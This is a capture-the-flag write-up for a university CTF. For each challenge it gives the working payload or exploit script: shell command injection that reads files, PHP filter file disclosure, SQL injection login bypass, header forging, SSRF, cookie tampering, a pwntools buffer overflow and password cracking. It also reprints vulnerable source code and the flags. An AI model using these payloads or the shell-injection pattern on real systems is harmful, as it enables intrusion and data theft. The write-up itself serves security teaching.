# CTF write up : EENS Ping --- * url: `http://eens.ee.ncku.edu.tw:5104/` * payload: ```bash= 127.0.0.1 | cat flag/flag.txt ``` * detail: `127.0.0.1 | cat app.py` ```python= from flask import Flask, render_template, request, url_for import subprocess app = Flask(__name__) @app.route('/') def home(): return render_template('home.html') @app.route('/', methods=['POST']) def webshell(): command = request.form['command'] if ("vi" or ">") in command: output = "your command is error!!!What are you trying to do!!!" else: try: output = subprocess.check_output("ping -c1 " + command, stderr=subprocess.STDOUT, shell=True) print output except Exception as e: output = "your command is error!!!What are you trying to do!!!" return render_template('home.html', allCarbDiet=output) if __name__ == '__main__': app.run(host='0.0.0.0', port=80) ``` * details: * 進入頁面首先看到一個可以輸入要 `ping` 的網址的input * 直接猜測後端使用 subprocess 之類的 * 先試試 `127.0.0.1 | ls` 確定可以用 pipeline `|` 繞過 * 用上面的 exploit 得到 `flag` * flag:`EENS{4fbaf3a4a7abdb459fc4f95fcbafb2dae920132583862c08eb4403037606e708}` ###### tags: `bypass` EZPHP --- * url: `eens.ee.ncku.edu.tw:5006` * payload: `php://filter/read=convert.base64-encode/resource=index.php` * result ```shell PCFET0NUWVBFIGh0bWw+ICAgICAKPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4KPC9oZWFkPgogICAgPGJvZHk+CiAgICAgICAgPHA+R2V0IG1lIGEgZmlsZSBuYW1lLCBJJ2xsIHJlYWQgdGhlIGZpbGUgZm9yIHlvdSAhPC9wPgoJCTxwIHN0eWxlPSJjb2xvcjpncmF5OyI+ICogVHJ5IDEudHh0IDwvcD4KPGZvcm0gYWN0aW9uPSJpbmRleC5waHAiIG1ldGhvZD0icG9zdCI+CllvdXIgaW5wdXQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJpbnB1dCIgLz4K44CAPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0i6YCB5Ye66KGo5ZauIi8+CjwvZm9ybT4KCjw/cGhwCi8vIFRoZSBmbGFnIGZvciBFWnBocCBpcyBFRU5TezNjY2JkN2I1NWU2N2EwOWJjMDg1ZTMyZjZhNzllMmNmZGZlMDNlODUyNWFlMmUyN2M5MmE2NDZjNjc5YmYwMGN9CgokaXAgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKaWYgKCRpcCA9PSAnMTI3LjAuMC4xJyl7CiAgICAvLyA1NVJmXzEKICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoImZsYWdWR2hwYzBselFVWnNZV2REWVc1dWIzUkNaVVp2ZFc1ayIpOwogICAgZWNobyAkY29udGVudDsKfQplbHNlaWYoJF9TRVJWRVJbIkhUVFBfQ0xJRU5UX0lQIl09PScxMjcuMC4wLjEnICYmICRfU0VSVkVSWyJIVFRQX1hfRk9SV0FSREVEX0ZPUiJdID09JzEyNy4wLjAuMScpewogICAgLy8gNTVSZl8yCiAgICAkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJmbGFnU1dSdmJuUjNZVzUwZVc5MWEyNXZkdz09Iik7CiAgICBlY2hvICRjb250ZW50Owp9CmVsc2V7CiAgICAkaW5wdXQgIC49ICAkX1BPU1QgWyAnaW5wdXQnIF07CiAgICAkZmlsZW5hbWUgPSB0cmltKCRpbnB1dCk7CiAgICBpZiAoc3RycG9zKCRpbnB1dCwgJ2ZsYWcnKSAhPT0gZmFsc2UpewogICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIGVjaG8gIllvdSBhcmUgYSBiYWQgaGFja2VyICEhISI7CiAgICB9CiAgICBlbHNlewogICAgICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGZpbGVuYW1lKTsKICAgICAgICBpZiAocHJlZ19tYXRjaCgiL2ZsYWcvaSIsICRjb250ZW50KSl7CgkJCWVjaG8gIjxicj4iOwogICAgICAgICAgICBlY2hvICJZb3UgYXJlIGEgYmFkIGhhY2tlciAhISEiOwogICAgICAgIH0KICAgICAgICBlbHNlewogICAgICAgICAgICBlY2hvICI8YnI+IjsKICAgICAgICAgICAgZWNobyAkY29udGVudDsKICAgICAgICB9CiAgICAgICAgCiAgICB9Cn0KPz4KICAgIDwvYm9keT4KCjwvaHRtbD4K ``` * base64 decode ```php= <!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <p>Get me a file name, I'll read the file for you !</p> <p style="color:gray;"> * Try 1.txt </p> <form action="index.php" method="post"> Your input: <input type="text" name="input" /> 　<input type="submit" name="送出表單"/> </form> <?php // The flag for EZphp is EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c} $ip = $_SERVER["REMOTE_ADDR"]; if ($ip == '127.0.0.1'){ // 55Rf_1 $content = file_get_contents("flagVGhpc0lzQUZsYWdDYW5ub3RCZUZvdW5k"); echo $content; } elseif($_SERVER["HTTP_CLIENT_IP"]=='127.0.0.1' && $_SERVER["HTTP_X_FORWARDED_FOR"] =='127.0.0.1'){ // 55Rf_2 $content = file_get_contents("flagSWRvbnR3YW50eW91a25vdw=="); echo $content; } else{ $input .= $_POST [ 'input' ]; $filename = trim($input); if (strpos($input, 'flag') !== false){ echo "<br>"; echo "You are a bad hacker !!!"; } else{ $content = file_get_contents($filename); if (preg_match("/flag/i", $content)){ echo "<br>"; echo "You are a bad hacker !!!"; } else{ echo "<br>"; echo $content; } } } ?> </body> </html> ``` * flag: `EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}` ###### tags: `pseudo protocol` `php` EZphp_2 --- * Header forge ``` X-Forwarded-For: 127.0.0.1 Client-IP: 127.0.0.1 ``` * flag: `EENS{868ff5b3432facbfab5a5657aaaf7f96301b673acb532236398e1d05b26380c6}` ###### tags: `Header` `X-Forwarded-For` `Burp suite` Try to Login --- * url: `http://eens.ee.ncku.edu.tw:5101` * payload: ```sql= 1' or '1'='1 ``` * flag: `EENS{cf2d891cb01a75a806ca50d6d5cb3f7af532534bb649ab1fa1f11464982419f8}` ###### tags: `sql injection` `bypass` EZphp_3 --- * payload: `http://127.0.0.1` * flag: `EENS{ae852e946757b0a32f386aeba991abae99c25d3ed4514fd1dfe0ebe43ab653c6}` ###### tags: `ssrf` Cookie Monster --- * url: `http://eens.ee.ncku.edu.tw:5102` * solution: * use ` burp suit` * changne cookie from `user` to `admin` ``` GET /fonts/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1 Host: eens.ee.ncku.edu.tw:5102 Accept: */* Connection: close Cookie: level: admin; session=0ba64634-7efd-4ee3-8052-7de342d7db3d.taDtAHyw_ixod5mf6Q7NVuWRaZg; _ga=GA1.3.666780538.1583373154; _gid=GA1.3.729447486.1584775510; s_pers=%20c19%3Dpr%253Apure%2520portal%253Apersons%253Aview%7C1584262262181%3B%20v68%3D1584260460625%7C1584262262186%3B%20v8%3D1584260581398%7C1678868581398%3B%20v8_s%3DMore%2520than%252030%2520days%7C1584262381398%3B; AMCV_4D6368F454EC41940A4C98A6%40AdobeOrg=-432600572%7CMCIDTS%7C18337%7CMCMID%7C34021734364032204804614156171821970172%7CMCAID%7CNONE%7CMCOPTOUT-1584267662s%7CNONE%7CMCAAMLH-1584865262%7C11%7CMCAAMB-1584865262%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI%7CMCSYNCSOP%7C411-18344%7CvVersion%7C4.5.2; s_fid=0B3F668660A8EC43-1554906741E9BCDC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15 Accept-Language: zh-tw Referer: http://eens.ee.ncku.edu.tw:5102/ Accept-Encoding: gzip, deflate ``` * flag: `EENS{35ee65df86b64dbb411fa3b6b803117844819e12f8372ebec139107738527506}` ###### tags: `cookie` `burp suite` Hello_CTF --- * copy paste * flag: `EENS{HeL10_C7f}` Guess a password --- * `strings rn.png` * flag: `EENS{Senbonzakura_Kageyoshi}` ###### tags: `strings` sha1 --- * google annouced sha1 collision https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html * gave two different pdf files have identical SHA-1 hashes but different content. * try: `echo "1" - | nc 140.116.215.203 5001` ```bash= Input first secret: Input second secret: Traceback (most recent call last): File "sha1.py", line 16, in <module> secret_2 = str(raw_input()) EOFError: EOF when reading a line [21] Failed to execute script sha1 ``` * exploit.py ```python= from pwn import * import hashlib import base64 f1 = open('shattered-1.pdf', 'rb').read() f2 = open('shattered-2.pdf', 'rb').read() encoder = hashlib.sha1() encoder.update(f1) print(encoder.digest()) encoder.update(f2) print(encoder.digest()) conn = remote('140.116.215.203', 5001) conn.recvline('Input first secret:') conn.sendline(base64.b64encode(f1)) conn.recvline('Input second secret:') conn.sendline(base64.b64encode(f2)) conn.interactive() ``` * flag: `EENS{974c7afceb5175b6b17ae7017827b6a6e8027c172dcb80cf53e52829f9cd222a}` Translate Me --- * exploit ```python=3 chiper = 'MHBFOBNMAOPSQWDVSFCUACSTBDRMOMSKGRZQHALJRNJSRRGLSREUFSLC' key = 'IDONTTHINKYOOOOOOOUCANSLOVETHISSOJUSTGIVEUPANDTAKEABREAK' dic = {} base = 64 f = open('cipher.txt') def decode(dic, c, k): i = dic[k].index(c) i += base return chr(i) [print(f.readline()) for i in range(3)] for i in range(26): tmp = f.readline() tmp = tmp.split('|') dic[tmp[0]] = tmp[1].replace('\n', '').split(' ') f.close() flag = '' for c, k in zip(chiper, key): if c == '{' or c == ' ' or c == '}': flag += c else: flag += decode(dic, c, k) print(flag) ``` * flag: `EENS{VIGENERE CIPHER IS A PAIN IN THE ASS IF YOU DONT USE ONLINE TOOLS}` You can't type --- * use https://www.onlineocr.net to translate it to text * flag: `EENS{이것이 나의 첫 CTF입니다}` Could you login? --- * pwn_1.c ```clike= #include <stdio.h> #include <stdlib.h> #include <string.h> char acc[10]; char pass[10]; char allow[4]; int main() { strcpy(allow,"no"); FILE *fd = fopen("secret.txt", "r"); char username[10], password[10], flag[256]; fscanf(fd, "%s", username); fscanf(fd, "%s", password); fscanf(fd, "%s", flag); printf("Username: \n"); fflush(stdout); scanf("%s",acc); fflush(stdout); printf("Password: \n"); fflush(stdout); scanf("%s",pass); fflush(stdout); if ((!strcmp(acc, username)) && !(strcmp(pass, password)) ) strcpy(allow, "yes"); if (!strcmp(allow, "yes")) printf("Nice!\n%s\n", flag); else printf("You are bad guy so you cannot access!\n"); fflush(stdout); return 0; } ``` * exploit.py ```python= from pwn import * conn = remote('140.116.215.203', 5201) conn.recvline('Username:') conn.sendline('a') conn.recvline('Password:') conn.sendline('b' * 10 + 'yes') conn.interactive() ``` * a classic buffer overflow * flag: `EENS{7his_Is_a_Simp1e_Buffer_0VERF1ow_practice.}` ###### tags: `overflow` God of Mental Arithmetic === * exploit.py ```python= from pwn import * def solve(q): q = q.replace('?', '').replace(' ', ''). replace('=', '') if '+' in q: Q = q.split('+') return str(int(Q[0])+int(Q[1])) else: Q = q.split('-') return str(int(Q[0])-int(Q[1])) conn = remote('140.116.215.203', 5005) for i in range(100): conn.recv() q = conn.recv().decode('utf-8').split('\n')[-2] conn.sendline(solve(q)) conn.interactive() ``` * flag: `EENS{a52e4d6f04166133d4e3e70aeec1e393d6c8dafdd0de138c51cf7be64483ffb6}` Eat more and more --- * given `a.out` * description: get 500 to win * reverse with `ghidra`: find a `scores` symbol * `gdb` ```shell= $> b main $> info address scores > get the address of symbol scores $> set {int}address = 500 $> c ``` * flag: `EENS{Be_Patient_AND_ENJOY_THIS_GAME!!!!}` ###### tags: `ghidra` `gdb` `reverse` Kids doodle === * `hexdump flag.png` -> `89 50 55 47` * png format: `89 50 4E 47` * [reference](https://asecuritysite.com/forensics/magic) * exploit.py ```python= with open('flag.png', 'rb') as f: data = bytearray(f.read()) data[2] = 0x4E f.close() with open('exploit.png', 'wb') as f: f.write(data) f.close() ``` * get a QRCODE: `RUVOU3tsYXM7ZG4sbXp3a2VqdGtzenguY252enhjdn0=` * flag: `EENS{las;dn,mzwkejtkszx.cnvzxcv}` ###### tags: `forensics` `magic number` Go upstairs without elevator --- * exploit ```python= import os from glob import glob lists = ['./850+236.zip'] def cal(path): p = path.replace('./', '') q = p.split('.')[0] a, b = q.split('+')[0], q.split('+')[1] return str(int(a)+int(b)) def unzip(path): ans = cal(path) os.system(f'unzip -P {ans} {path}') files = glob('./*.zip') for f in files: if f not in lists: return f target = './850+236.zip' while True: new = unzip(target) lists.append(new) target = new ``` * flags: `EENS{Th3r3_ls_th3_FIag_TEN50fTHOUSAND50f_STAGE5_AND_1I11l1ll1l1l1ll1lIIll1III1}` Chained Connie --- * exploit ```python= import requests flag = [] for i in range(0, 30): r = requests.get(f'http://eens.ee.ncku.edu.tw:5103/search?p={i}') flag.append(r.headers['flag']) print(''.join(flag)) ``` * flag: `EENS{Not_only_block_can_chain}` zip the zip --- * exploit * use `https://github.com/Ethonwu/Zip-file-crack-using-dictionary` * with `rockyou.txt` * password: `zxcvbnm` * flag: `EENS{Whether_'tis_nobler_in_the_mind_to_suffer}`